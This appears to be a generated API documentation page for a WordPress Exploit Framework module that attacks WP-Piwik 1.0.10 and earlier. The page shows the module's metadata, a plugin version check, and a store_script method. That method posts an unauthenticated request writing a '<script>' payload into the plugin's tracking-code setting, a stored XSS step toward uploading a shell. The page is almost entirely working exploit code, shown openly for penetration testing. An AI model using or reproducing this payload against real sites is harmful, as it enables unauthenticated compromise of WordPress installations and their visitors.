class Wpxf::Exploit::WpPiwikStoredXssShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StoredXss::new
# File lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb, line 6 def initialize super update_info( name: 'WP-Piwik <= 1.0.10 Unauthenticated Stored XSS Shell Upload', author: [ 'White Fir Design', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8613'], ['URL', 'https://www.pluginvulnerabilities.com/2016/08/29/persistent-cross-site-scripting-xss-vulnerability-in-wp-piwik/'] ], date: 'Sep 02 2016' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb, line 23 def check check_plugin_version_from_readme('wp-piwik', '1.0.11') end
store_script()
click to toggle source
# File lib/wpxf/modules/exploit/xss/stored/wp_piwik_stored_xss_shell_upload.rb, line 27 def store_script execute_post_request( url: full_uri, body: { 'wp-piwik[track_mode]' => 'manually', 'wp-piwik[tracking_code]' => "<script>#{xss_include_script}</script>" } ) end